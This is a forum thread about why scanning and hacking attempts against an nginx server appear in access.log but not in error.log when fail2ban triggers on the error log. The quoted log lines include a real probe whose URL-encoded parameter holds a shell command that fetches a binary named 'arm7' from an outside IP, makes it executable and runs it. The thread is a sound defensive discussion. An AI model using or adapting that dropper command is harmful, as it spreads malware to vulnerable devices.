Attempts to access non-existent URLs don't always show up in error log

Running nginx on FreeBSD 14.3. I only provide a couple of simple web pages (and the user has to know the full path - no index.html) and I want to use fail2ban to block robots and hacking attempts.

I am triggering on error.log, but seems not all illegal accesses show up in the error log. Here is the last two lines from access.log:

5.183.209.244 - - [19/Jun/2025:14:15:56 +0200] "GET / HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
104.167.221.114 - - [19/Jun/2025:14:37:55 +0200] "POST /device.rsp?opt=sys&cmd=___S_O_S_T_R_E_A_MAX___&mdb=sos&mdc=cd%20%2Ftmp%3Brm%20arm7%3B%20wget%20http%3A%2F%2F104.167.221.114%2Farm7%3B%20chmod%20777%20%2A%3B%20.%2Farm7%20tbkdvr HTTP/1.1" 301 162 "-" "Mozila/5.0"

Neither shows up in error.log.

Any suggestions for how I can get all illegal accesses to show up in the error log?

Hi @Julf! I am not entirely sure I understand your setup – how do you determine an access is illegal? What are you triggering on the error log?

The NGINX error log cannot really be customized beyond defining what type of severity you want to log, so you might want to adapt your setup to use the access log, which can be easily customized.

1 Like

Shouldn’t something like this cause an error to be logged?

104.167.221.114 - - [19/Jun/2025:19:55:00 +0200] "POST /device.rsp?opt=sys&cmd=___S_O_S_T_R_E_A_MAX___&mdb=sos&mdc=cd%20%2Ftmp%3Brm%20arm7%3B%20wget%20http%3A%2F%2F104.167.221.114%2Farm7%3B%20chmod%20777%20%2A%3B%20.%2Farm7%20tbkdvr HTTP/1.1" 301 162 "-" "Mozila/5.0"

Did NGINX crash during the request? If it didn’t, it’s not really a critical error per NGINX. There might be some other errors that will get logged during runtime but that would also depend on which severity you have set the error log to log. However, I just noticed that hitting that endpoint seems to be triggering a 301 status code, which means that by all accounts you are being redirected somewhere correctly.

1 Like